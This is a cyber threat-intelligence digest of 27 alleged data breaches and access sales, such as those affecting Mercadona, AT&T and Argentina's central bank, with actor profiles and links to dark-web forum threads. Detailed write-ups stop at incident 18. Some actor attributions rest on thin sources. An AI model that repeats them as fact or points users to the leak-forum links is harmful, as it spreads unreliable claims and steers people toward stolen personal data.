I. Executive Summary
The past 24 hours have seen a significant volume of alleged cyber incidents, primarily focusing on data breaches and leaks across various sectors and geographies. These incidents highlight the persistent threat posed by financially motivated cybercriminals seeking to monetize sensitive information, as well as groups aiming for initial access to corporate and governmental networks. The compromised data ranges from extensive user databases containing personal and financial credentials to highly sensitive government and medical records. A notable trend is the continued exploitation of vulnerabilities for direct data exfiltration and the sale of access, indicating a robust underground market for illicitly obtained information. While many threat actors remain unprofiled in public intelligence, the patterns observed underscore the critical need for enhanced data protection, robust access controls, and continuous vigilance against evolving cybercriminal tactics.
II. Incident Overview
This section provides a structured summary of the cybersecurity incidents reported in the last 24 hours, offering a rapid overview of the day’s significant events.
Summary of Reported Incidents
The recent activity highlights a pervasive landscape of data breaches and leaks, with a strong emphasis on financial gain through the sale of compromised information. Incidents span across diverse sectors, including supermarkets, e-commerce, government administration, healthcare, and financial services, affecting countries such as Spain, China, Indonesia, USA, Poland, Thailand, Argentina, Jordan, and Myanmar. The types of data exposed are highly sensitive, encompassing millions of user records, financial details, personal identification documents, and even medical histories. Additionally, several instances of initial access sales, including administrative panel access and SSH root access, indicate a market for network infiltration capabilities. Many of the identified threat actors appear to be financially motivated individuals or groups, with limited public profiling available for some, underscoring the fragmented nature of the cybercriminal ecosystem.
Key Table: Daily Incident Summary
For a quick reference, the table below summarizes the core details of the incidents analyzed in this report.
| Incident ID | Affected Organization/Sector | Type of Breach | Primary Threat Actor(s) | Key Impact |
| INC-001 | Mercadona (Hacendado) | Data Breach | WhiteCoat | 27M+ unique users’ names, emails, passwords |
| INC-002 | Barbiebox | Data Breach | Panda | Customer IDs, names, emails, phone numbers, payment/shipping addresses, order details |
| INC-003 | Dewan Perwakilan Rakyat Republik Indonesia | Data Breach | KalengKongGhuan | ID, province ID, name, place/date of birth, position, political faction, address |
| INC-004 | Indonesia Citizenship Data | Data Leak | TopiAx | 2.3 million citizenship records |
| INC-005 | Unidentified US Healthcare Provider | Data Breach | Ansgar | 100,000+ patient records (medications, SSNs, contact info, medical card records) |
| INC-006 | Unidentified US Woocommerce Shop | Initial Access | inb4 | Full WordPress admin access |
| INC-007 | USA Citizens | Data Leak | Sharkylik | Names, surnames, addresses, phone numbers, email addresses |
| INC-008 | U.S. Crypto Users | Data Leak | hagilo2748 | U.S. Crypto User database |
| INC-009 | Europe Database | Data Leak | Sharkylik | Gmail, names, surnames, phone numbers |
| INC-010 | Polish Consumers | Data Leak | decojo4605 | Polish consumer phone numbers |
| INC-011 | Various Servers | Initial Access | ValhalaNet | SSH Port 22 access with mixed root privileges |
| INC-012 | BUKALAPAK | Data Breach | DigitalGhost | Names, emails, usernames, passwords |
| INC-013 | Multinational Corp (US, UK) | Data Leak | G3TTY | 300 passports, driver’s licenses of employees |
| INC-014 | E-payment (Thailand) | Initial Access | NXBB.SEC | Access to e-payment system |
| INC-015 | Immigration Bureau Accommodation Notification System (Thailand) | Initial Access | NXBB.SEC | Access to immigration system |
| INC-016 | Agricultural Land Reform Office (Thailand) | Initial Access | NDT SEC | User IDs and Passwords |
| INC-017 | Zabbix (Telecom Company) | Initial Access | h4tr3dw0rld | Admin access to Zabbix panel (16,000+ active hosts) |
| INC-018 | Central Bank of the Argentine Republic | Data Breach | SPOA | 19M+ customer records (names, IDs, financial history, debt reports) |
| INC-019 | Indian Membership Card Website | Initial Access | gesss | Admin access to website |
| INC-020 | Individuals from Israel | Data Leak | DigitalGhost | Names, genders, emails, phone numbers, IP addresses, locations, professional affiliations |
| INC-021 | Ministry of Defense of the Republic of Indonesia | Data Breach | DigitalGhost | PII of civil servant selection participants (NIK, names, job roles, test locations) |
| INC-022 | LINE Bank | Data Breach | DigitalGhost | Account numbers, holder names, IFSC codes, phone numbers, email addresses |
| INC-023 | Ramkhamhaeng University | Data Leak | NDT SEC | 15 GB of data and documents |
| INC-024 | YPT | Data Leak | adhuc | User ID, email, mobile number, nickname |
| INC-025 | Jordan Kuwait Bank | Data Breach | Everest | 1,003 employee personal records, 11.7 GB internal/confidential data |
| INC-026 | Innwa Bank | Data Breach | ClayOxtymus1337 | 46MB of compressed files from military-owned bank |
| INC-027 | AT&T | Data Breach | wht | 73M+ records (names, phone numbers, SSNs, dates of birth, emails, addresses) |
III. Detailed Incident Analysis and Threat Actor Profiles
This section provides an in-depth analysis of each reported incident, coupled with comprehensive profiles of the associated threat actors, detailing their motivations, tactics, techniques, and historical activities where information is available.
Incident 1: Alleged sale of Hacendado Data via Third-Party Vendor
Incident Details: A threat actor, identified as “WhiteCoat,” claims to be selling over 27,000,000 unique user records allegedly compromised from Hacendado, a brand distributed by Mercadona, a major supermarket chain in Spain. The data reportedly includes sensitive information such as names, email addresses, and passwords. The actor asserts that the breach occurred through a zero-day vulnerability in a third-party vendor, indicating a supply chain attack vector. This incident highlights the significant risk posed by third-party dependencies, where vulnerabilities in external systems can lead to massive data compromises for primary organizations.
Associated Threat Actor(s) Profile: WhiteCoat
Identity and Aliases: Based on the available research material, there is no specific profile or known aliases for a cyber threat actor named “WhiteCoat”.1 The term “White Coat” in general cybersecurity context often refers to “white hat” hackers or ethical security researchers, or in a medical context to “white coat hypertension”.2 Given the nature of this incident (selling stolen data), it is highly probable that “WhiteCoat” is either a self-assigned moniker for a financially motivated individual or a lesser-known group, for whom public threat intelligence is not readily available.
Motivation and Objectives: The explicit claim of “selling data” points to a clear financial motivation. The objective is to monetize the large volume of compromised user data, likely through direct sale on underground forums for use in credential stuffing attacks, phishing campaigns, or identity theft.
Tactics, Techniques, and Procedures (TTPs): The threat actor claims the breach was achieved via a “0day in 3rd Party Vendor,” suggesting exploitation of a previously unknown or unpatched vulnerability in a supplier’s system. This indicates a focus on supply chain attacks, which can be highly effective in bypassing the direct defenses of a target organization by compromising a less secure partner.
Historical Context and Noteworthy Campaigns: Due to the lack of specific profiling for “WhiteCoat” in the provided research, no historical context or noteworthy campaigns can be attributed to this specific actor. The incident itself represents a significant data breach due to the volume of records claimed.
Relevant Links:
- Published URL: https://darkforums.st/Thread-LEAK-27M-USERS-%E2%80%94-Hacendado-Breach-via-0day-in-3rd-Party-Vendor
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/412d16bd-50ce-439b-8c3a-e05caab75840.png
Incident 2: Alleged Database Leak of Barbiebox
Incident Details: A threat actor named “Panda” claims to have leaked the entire database of Barbiebox, an e-commerce platform. The compromised data is extensive, reportedly including customer IDs, names, email addresses, phone numbers, payment and shipping addresses, order totals, payment methods, and tracking information. This type of comprehensive customer data is highly valuable on the black market for various fraudulent activities, including identity theft and targeted phishing.
Associated Threat Actor(s) Profile: Panda
Identity and Aliases: While “Panda” is a common term in cybersecurity, often associated with China-linked Advanced Persistent Threat (APT) groups like “Aquatic Panda” (also known as APT41, Winnti Group, Bronze University, Charcoal Typhoon, Earth Lusca, RedHotel, and FishMonger) 3, the provided JSON simply lists “Panda” without further context. The research material on “Aquatic Panda” describes a state-sponsored espionage group 3, which typically focuses on intelligence gathering rather than direct data sales from e-commerce sites. Therefore, without additional information, it is not possible to definitively link this “Panda” to the well-known “Aquatic Panda” APT group. It is more likely that “Panda” is a self-assigned moniker for a financially motivated individual or a distinct, less-profiled cybercriminal.
Motivation and Objectives: The motivation behind this incident is clearly financial, as the threat actor has “leaked the database,” implying an intent to sell or publicly expose the data to gain notoriety or profit. The comprehensive nature of the stolen customer data makes it highly marketable for various forms of fraud.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to breach Barbiebox and exfiltrate the database are not detailed in the provided information. However, the successful acquisition of such a broad range of customer data suggests a compromise of core database systems, potentially through web application vulnerabilities, SQL injection, or compromised credentials.
Historical Context and Noteworthy Campaigns: No specific historical context or noteworthy campaigns can be attributed to a threat actor solely identified as “Panda” in the provided research material, distinct from the state-sponsored “Aquatic Panda” group.
Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-ELITE-BARBIEBOX-COM-ORDER-DATABASE-%E2%80%93-FRESH-LOADED
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/c41ca3ec-2e56-4f76-8cc5-0c8cc6b24654.PNG
Incident 3: Alleged Database Leak of Dewan Perwakilan Rakyat Republik Indonesia
Incident Details: A threat actor named “KalengKongGhuan” claims to have leaked the database of the Dewan Perwakilan Rakyat Republik Indonesia (DPR RI), the House of Representatives of the Republic of Indonesia. The compromised data reportedly contains sensitive information about individuals, including their ID, province ID, name, place of birth, date of birth, position, political faction, address, and additional remarks. This type of data could be used for targeted phishing, social engineering, or political influence operations.
Associated Threat Actor(s) Profile: KalengKongGhuan
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “KalengKongGhuan” in the available research material. This suggests that “KalengKongGhuan” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation for leaking a government database could range from hacktivism (to expose information or protest) to financial gain (by selling the data to interested parties). Given the nature of the data (political affiliations, positions), it could also be used for intelligence gathering or influence operations.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs employed to breach the DPR RI database are not detailed. However, compromising a government entity’s database often involves exploiting web application vulnerabilities, network misconfigurations, or social engineering to gain initial access.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “KalengKongGhuan” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-Document-1-MILLION-DPR-RI-DATABASE-2025
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/2aefe0ff-58ed-4776-bd1a-3016a436b088.PNG
Incident 4: Alleged Leak of Indonesian Citizenship Data
Incident Details: A threat actor named “TopiAx” claims to have obtained and leaked 2.3 million records of Indonesian citizenship data. The content of this data is not explicitly detailed beyond its size and origin. Such a large-scale leak of citizenship data poses significant risks for identity theft, fraud, and potential state-level intelligence gathering.
Associated Threat Actor(s) Profile: TopiAx
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “TopiAx” in the available research material.5 The snippets discuss general TTPs and other threat actors, but do not provide information specific to “TopiAx.”
Motivation and Objectives: The motivation for leaking citizenship data is typically financial gain, as such data is highly sought after on illicit markets for identity fraud, creating fake documents, or for use by other malicious actors.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used by “TopiAx” to acquire this data are not detailed. However, large-scale data leaks often result from compromises of government databases, public sector systems, or third-party services holding citizen information. Threat actors commonly employ data exfiltration techniques to steal sensitive data and then leak it directly or sell it.6
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “TopiAx” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-2-3-MILLIONS-INDONESIA-CITIZENSHIP-DATA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/bf9865dc-2725-4ffa-9702-14fe299de2c9.png
Incident 5: Alleged Database Sale of Unidentified Healthcare Company in USA
Incident Details: A threat actor named “Ansgar” is allegedly selling a full Oracle database from a U.S.-based dialysis healthcare provider with over $100 million in revenue. The compromised data is highly sensitive, reportedly including details on over 100,000 patients, covering medications, prescriptions, analyses, Social Security numbers, contact information, addresses, and complete medical card records. This incident underscores the high value of healthcare data on the black market and the severe privacy implications for affected individuals.
Associated Threat Actor(s) Profile: Ansgar
Identity and Aliases: “Ansgar” is identified as a threat actor involved in data exfiltration and sale. This actor was previously linked to the data breach of MediSecure, an Australian prescription services provider, where they also put stolen information up for sale on an underground forum.7 There are no specific aliases provided for Ansgar in the available research.
Motivation and Objectives: Ansgar’s primary motivation is financial gain, achieved by selling highly sensitive stolen data on underground forums.7 The objective is to monetize the exfiltrated information, which can be used for identity theft, medical fraud, or other illicit activities.
Tactics, Techniques, and Procedures (TTPs): The core TTP observed for Ansgar is large-scale data exfiltration, followed by attempts to monetize the data through sales on dark web forums.7 While the specific initial access methods for this incident are not detailed, the ability to obtain a “full Oracle database” suggests a significant compromise of the victim’s core systems. Ansgar provided screenshots as proof of possession in a previous incident, a common tactic to validate claims to potential buyers.7
Historical Context and Noteworthy Campaigns: Ansgar has been noted for the MediSecure data breach, where they claimed to possess 6.5 terabytes of files containing sensitive personal and medical information, which they attempted to sell for $50,000.7 This current incident involving a U.S. healthcare provider further solidifies Ansgar’s focus on the healthcare sector and data monetization.
Relevant Links:
- Published URL: https://ramp4u.io/threads/sell-full-medical-oracle-data-base.3163/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/8affc21e-d207-4a0f-b9cf-53f97b700d7e.png
Incident 6: Alleged Sale of Admin Access to an Unidentified Shop in USA
Incident Details: A threat actor named “inb4” claims to be selling unauthorized administrative access to a U.S.-based WooCommerce shop. The compromised WordPress installation reportedly allows full WordPress admin access, including the ability to install plugins. This type of access can be highly valuable for various malicious activities, such as injecting malware, redirecting traffic, stealing customer data, or defacing the website.
Associated Threat Actor(s) Profile: inb4
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “inb4” in the available research material.8 The snippets discuss general email attacks, corporate espionage, and North Korean operatives, but do not provide information specific to “inb4.”
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” unauthorized access. Initial access brokers (IABs) often sell such access to other cybercriminals who then conduct further malicious activities like data theft, ransomware deployment, or website defacement.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain admin access are not detailed. However, common methods for compromising WordPress sites include exploiting vulnerabilities in themes or plugins, brute-forcing weak credentials, or phishing campaigns targeting administrators. The sale of “full WordPress admin access” suggests a complete compromise of the administrative interface.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “inb4” based on the provided research.
Relevant Links:
- Published URL: https://forum.exploit.in/topic/260286/?tab=comments#comment-1571197
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/93200753-dd19-4832-9fc7-590b55c2547d.png
Incident 7: Alleged Data Leak of USA Citizens
Incident Details: A threat actor named “Sharkylik” claims to have leaked a database containing personal data of USA citizens. The exposed information includes names, surnames, addresses, phone numbers, and email addresses. This type of data is commonly used for targeted phishing, spam campaigns, and identity theft.
Associated Threat Actor(s) Profile: Sharkylik
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “Sharkylik” in the available research material.10 The snippet discusses “Shathak,” a different threat group. This suggests that “Sharkylik” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation for leaking citizen data is typically financial gain, as such information is valuable for various forms of fraud and illicit marketing.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Large-scale data leaks often result from compromises of government databases, public sector systems, or third-party services holding citizen information.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “Sharkylik” based on the provided research.
Relevant Links:
- Published URL: https://leakbase.la/threads/usa-data-base.39091/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/ed51c1a2-d350-4bb3-abdc-99beb7491a82.png
Incident 8: Alleged Leak of U.S. Crypto Users Database
Incident Details: A threat actor named “hagilo2748” claims to have leaked a database specifically targeting U.S. Crypto Users. The content of this database is not explicitly detailed beyond its target demographic. Such a leak could expose individuals to cryptocurrency theft, targeted phishing for wallet credentials, or other financial scams.
Associated Threat Actor(s) Profile: hagilo2748
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “hagilo2748” in the available research material. This suggests that “hagilo2748” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation is financial, aiming to exploit the value of cryptocurrency users’ data for direct theft or to facilitate other scams.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Compromising cryptocurrency user databases could involve exploiting vulnerabilities in crypto exchanges, wallet services, or related platforms.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “hagilo2748” based on the provided research.
Relevant Links:
- Published URL: https://leakbase.la/threads/usa-crypto-user-database.39089/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/e2874c35-cad2-4849-aafc-eeb567ec7e05.PNG
Incident 9: Alleged Data Leak of Europe Database
Incident Details: A threat actor named “Sharkylik” claims to have obtained and leaked a database pertaining to Europe. The compromised data reportedly contains Gmail addresses, names, surnames, and phone numbers. This broad dataset could be used for widespread spam, phishing campaigns, or targeted social engineering attacks across European countries.
Associated Threat Actor(s) Profile: Sharkylik
Identity and Aliases: As with Incident 7, there is no specific profile or known aliases for “Sharkylik” in the available research material.10
Motivation and Objectives: The motivation for leaking this European database is likely financial, as personal contact information and email addresses are valuable for various illicit activities, including marketing scams, phishing, and identity verification bypasses.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Large-scale data leaks often result from compromises of online services, marketing databases, or other platforms holding personal information.
Historical Context and Noteworthy Campaigns: No additional historical context or noteworthy campaigns can be attributed to “Sharkylik” beyond the two incidents mentioned in this report.
Relevant Links:
- Published URL: https://leakbase.la/threads/europe-database.39090/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/c63973c0-ee85-49cc-aab5-889dd563b027.png
Incident 10: Alleged Data Leak of Polish Consumer Phone Numbers
Incident Details: A threat actor named “decojo4605” claims to have leaked a database consisting of Polish consumer phone numbers. While seemingly limited in scope to phone numbers, such a dataset can be highly valuable for targeted smishing (SMS phishing) campaigns, robocalls, or other forms of telemarketing fraud.
Associated Threat Actor(s) Profile: decojo4605
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “decojo4605” in the available research material. This suggests that “decojo4605” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation is financial, aiming to sell or use the phone number database for illicit marketing, scam calls, or smishing campaigns.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Consumer phone number databases can be obtained through various means, including breaches of telecommunication companies, marketing firms, or data brokers.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “decojo4605” based on the provided research.
Relevant Links:
- Published URL: https://leakbase.la/threads/poland-consumer-phone-number-database.39088/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3b08a918-3ed7-466e-9240-066dfe0d7793.PNG
Incident 11: Alleged Sale of Various SSH Root Accesses
Incident Details: A threat actor named “ValhalaNet” claims to be selling SSH Port 22 access to various servers, with mixed levels of root privileges. SSH (Secure Shell) access, especially with root privileges, grants powerful control over compromised servers, allowing attackers to execute commands, transfer files, and potentially pivot to other systems within a network. This type of offering is typical of initial access brokers (IABs).
Associated Threat Actor(s) Profile: ValhalaNet
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “ValhalaNet” in the available research material. This suggests that “ValhalaNet” is likely a unique handle for an individual or a small, unprofiled group operating as an initial access broker.
Motivation and Objectives: The motivation is purely financial, as the threat actor is “selling” unauthorized access. Initial access brokers monetize their ability to gain footholds in networks, selling this access to other cybercriminals who may then deploy ransomware, exfiltrate data, or conduct other malicious activities.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain SSH root access are not detailed. Common methods include exploiting vulnerabilities in unpatched servers, brute-forcing SSH credentials, or compromising systems through other means (e.g., phishing) to obtain SSH keys or credentials.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “ValhalaNet” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-1K-VALID-SSH-ROOT-ACCESS-MIXED
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/705e423b-895c-4e50-9ce2-277e9aa705b9.PNG
Incident 12: Alleged Data Breach of BUKALAPAK
Incident Details: A threat actor named “DigitalGhost” claims to have obtained data from BUKALAPAK, an Indonesian e-commerce company. The compromised data reportedly includes sensitive information such as names, email addresses, usernames, and passwords. This type of data is highly valuable for credential stuffing attacks and identity theft.
Associated Threat Actor(s) Profile: DigitalGhost
Identity and Aliases: “DigitalGhost” appears to be an alias for “GhostSec” or “Ghost actors,” a group with ties to the Anonymous collective that has shifted from hacktivism to financially motivated activities.11 Other aliases associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.12 Ghost actors are reportedly located in China and conduct widespread attacks for financial gain.12
Motivation and Objectives: The motivation is financial gain, as the group has shifted towards a “financially motivated cyber mafia organization” model.11 The objective is to monetize the stolen data, likely through sale on underground forums.
Tactics, Techniques, and Procedures (TTPs): Ghost actors are known for exploiting publicly available code and well-known vulnerabilities in internet-facing servers, particularly those with outdated software or unapplied patches.12 They often gain initial access by exploiting public-facing applications associated with multiple CVEs.12 Once inside, they may upload web shells and use PowerShell or Command Prompt to download and execute malware like Cobalt Strike Beacon.12 They also focus on defense evasion by disabling antivirus software like Windows Defender.12
Historical Context and Noteworthy Campaigns: GhostSec has been active since at least 2015, initially participating in hacktivist initiatives like #opisis against ISIS.11 In late July 2022, they announced a shift to a subscription-based premium channel, GhostSec Mafia Premium, to share exclusive content and leaks, marking their transition to financially motivated operations.11 Since early 2021, Ghost actors have indiscriminately targeted networks with vulnerabilities across over 70 countries, including critical infrastructure, schools, healthcare, and government networks.12
Relevant Links:
- Published URL: https://darkforums.st/Thread-BUKALAPAK-INDONESIA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/12e33a47-acbc-4fbf-8d38-1e4d7a434420.png
Incident 13: Alleged Leak of Passport and ID Cards Data from Multinational Corporation
Incident Details: A threat actor named “G3TTY” claims to be selling approximately 300 passports, driver’s licenses, and other identification documents belonging to employees of a multinational corporation, primarily from the U.S. and UK. The sale of such sensitive identification documents poses a severe risk for identity theft, fraud, and potentially even physical security threats to the individuals involved.
Associated Threat Actor(s) Profile: G3TTY
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “G3TTY” in the available research material.13 The snippets discuss the general challenge of inconsistent threat actor naming conventions and collaborative efforts to standardize them, but do not provide information specific to “G3TTY.”
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” the leaked data. Identification documents are highly valuable on the black market for various forms of identity fraud, including opening fraudulent accounts, obtaining loans, or bypassing security checks.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire these documents are not detailed. Compromising a multinational corporation to obtain employee identification documents could involve sophisticated phishing campaigns, insider threats, or breaches of HR systems or document management platforms.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “G3TTY” based on the provided research.
Relevant Links:
- Published URL: https://forum.exploit.in/topic/260277/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/0bbabf2a-e276-4faa-8f71-f98e0ae9606e.png
Incident 14: Group Claims to Have Leaked Access to E-payment System (Thailand)
Incident Details: A group identified as “NXBB.SEC” claims to have leaked access to an e-payment system in Thailand. The specific nature of the access or the compromised data is not detailed, but unauthorized access to an e-payment system could lead to financial fraud, theft of payment credentials, or disruption of financial services.
Associated Threat Actor(s) Profile: NXBB.SEC
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “NXBB.SEC” in the available research material.15 The snippets discuss “Ghost actors” and “RansomHub,” but do not provide information specific to “NXBB.SEC.”
Motivation and Objectives: The motivation for leaking access to an e-payment system is typically financial, either by directly exploiting the access for fraudulent transactions or by selling the access to other cybercriminals.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain access are not detailed. Compromising e-payment systems often involves exploiting web application vulnerabilities, API weaknesses, or gaining access through compromised credentials.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “NXBB.SEC” based on the provided research.
Relevant Links:
- Published URL: https://t.me/NxbbSec/374
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/b87070c9-e2d0-4d9c-9c47-126dd882d722.png
Incident 15: Alleged Leak of Access to Immigration Bureau Accommodation Notification System (Thailand)
Incident Details: The group “NXBB.SEC” also claims to have leaked access to the Immigration Bureau Accommodation Notification System in Thailand. Unauthorized access to such a system could expose sensitive personal and travel information of individuals, potentially leading to identity theft, surveillance, or other forms of abuse.
Associated Threat Actor(s) Profile: NXBB.SEC
Identity and Aliases: As with Incident 14, there is no specific profile or known aliases for “NXBB.SEC” in the available research material.15
Motivation and Objectives: The motivation for leaking access to a government immigration system could be financial (selling access or data), hacktivism, or intelligence gathering.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain access are not detailed. Compromising government systems often involves exploiting vulnerabilities in public-facing applications, network misconfigurations, or social engineering.
Historical Context and Noteworthy Campaigns: No additional historical context or noteworthy campaigns can be attributed to “NXBB.SEC” beyond the two incidents mentioned in this report.
Relevant Links:
- Published URL: https://t.me/NxbbSec/377
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/242ebd1e-fc2c-4f5e-9430-24c0f8ee72ea.png
Incident 16: Alleged Sale of Unauthorized Access to Agricultural Land Reform Office (Thailand)
Incident Details: A group identified as “NDT SEC” claims to have unauthorized access to the Agricultural Land Reform Office in Thailand. The leak reportedly contains User IDs and Passwords. Compromised credentials for a government office can lead to further network infiltration, data exfiltration, or disruption of services.
Associated Threat Actor(s) Profile: NDT SEC
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “NDT SEC” in the available research material.16 The snippets discuss the SEC’s Cyber and Emerging Technologies Unit and FBI warnings about end-of-life routers, but do not provide information specific to “NDT SEC.”
Motivation and Objectives: The motivation for selling unauthorized access is typically financial, allowing other malicious actors to leverage the compromised credentials for their own objectives.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain access and obtain User IDs and Passwords are not detailed. Common methods include phishing, brute-force attacks, or exploiting vulnerabilities in web applications or network services.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “NDT SEC” based on the provided research.
Relevant Links:
- Published URL: https://t.me/NxbbSec/373
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/49e1ecd9-e040-4fa1-a491-fd018d4eb465.png
Incident 17: Alleged Sale of Admin Access to Zabbix (Telecom Company)
Incident Details: A threat actor named “h4tr3dw0rld” is selling access to a Zabbix admin panel with over 16,000 active hosts, claiming Super Admin permissions. The target appears to be a telecom company based in Angola. API data reportedly confirms access to approximately 16,052 active hosts out of 16,187 total, along with 30 users spread across multiple administrative and read-only user groups. Zabbix is an enterprise-class open source monitoring solution, and compromising its admin panel grants extensive control over monitored systems, posing a severe risk to the telecom infrastructure.
Associated Threat Actor(s) Profile: h4tr3dw0rld
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “h4tr3dw0rld” in the available research material. This suggests that “h4tr3dw0rld” is likely a unique handle for an individual or a small, unprofiled group operating as an initial access broker.
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” unauthorized access. Gaining Super Admin access to a critical monitoring system like Zabbix in a telecom environment could be highly valuable for espionage, sabotage, or further network exploitation.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain Zabbix admin access are not detailed. Common methods for compromising monitoring systems include exploiting software vulnerabilities, weak credentials, or misconfigurations. The detailed API data confirmation suggests a deep level of access and reconnaissance by the threat actor.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “h4tr3dw0rld” based on the provided research.
Relevant Links:
- Published URL: https://forum.exploit.in/topic/260268/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/60156300-3ecf-4492-9fe1-ac87678af8cd.png, https://d34iuop8pidsy8.cloudfront.net/12c9b56a-a3e4-452d-9a6f-ed63f750e6e3.png
Incident 18: Alleged Data Breach of Central Bank of the Argentine Republic
Incident Details: A threat actor named “SPOA” claimed responsibility for a significant data breach involving the Central Bank of Argentina (BCRA). The actor is selling a database reportedly containing 19,000,680 real customer records. This highly sensitive data includes full names, document types and numbers, CUIL (tax ID), date of birth, physical address, phone number, and a unique client number. Furthermore, this data is linked to detailed financial records such as debt reports, loans, credit information, and overall financial history as registered with BCRA. This incident represents a critical compromise of national financial data.
Associated Threat Actor(s) Profile: SPOA
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “SPOA” in the available research material.18 The term “SPOA” in the snippets refers to “Single Point of Access” in mental health services or “Scottish Partnership Against Acquisitive Crime” (SPAACE), neither of which are cybercrime groups. This suggests that “SPOA” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” the extensive database. Such a comprehensive financial dataset is extremely valuable for large-scale financial fraud, identity theft, and potentially even economic espionage.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to breach the Central Bank are not detailed. Compromising a central bank’s database would require sophisticated methods, potentially involving exploiting critical infrastructure vulnerabilities, insider threats, or highly targeted social engineering campaigns.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “SPOA” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-BCRA-Database-Leak
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/39ee59b5-44db-48
Works cited
- Threat Actors Target U.S. Critical Infrastructure with LummaC2 Malware | CISA, accessed June 4, 2025, https://www.cisa.gov/news-events/alerts/2025/05/21/threat-actors-target-us-critical-infrastructure-lummac2-malware
- The Impact of White Coat Syndrome on Long-term Health – AARP, accessed June 4, 2025, https://www.aarp.org/health/conditions-treatments/white-coat-syndrome/
- China-Linked APT Aquatic Panda: 10-Month Campaign, 7 Global Targets, 5 Malware Families – The Hacker News, accessed June 4, 2025, https://thehackernews.com/2025/03/china-linked-apt-aquatic-panda-10-month.html
- AQUATIC PANDA CYBER THREAT ACTORS – FBI, accessed June 4, 2025, https://www.fbi.gov/wanted/cyber/aquatic-panda-cyber-threat-actors
- Cyber threats impacting the financial sector in 2024 – focus on the main actors, accessed June 4, 2025, https://blog.sekoia.io/cyber-threats-impacting-the-financial-sector-in-2024-focus-on-the-main-actors/
- Cybersecurity TTPs: How Threat Actors Operate – Veeam, accessed June 4, 2025, https://www.veeam.com/blog/ttp-cybersecurity.html
- May 2024: Biggest Cyber Attacks, Data Breaches & Ransomware Attacks, accessed June 4, 2025, https://www.cm-alliance.com/cybersecurity-blog/may-2024-biggest-cyber-attacks-data-breaches-ransomware-attacks
- Threat actor launches email attacks to lift corporate M&A secrets, Mandiant says, accessed June 4, 2025, https://www.cybersecuritydive.com/news/email-corporate-espionage-merger-acquisition/623271/
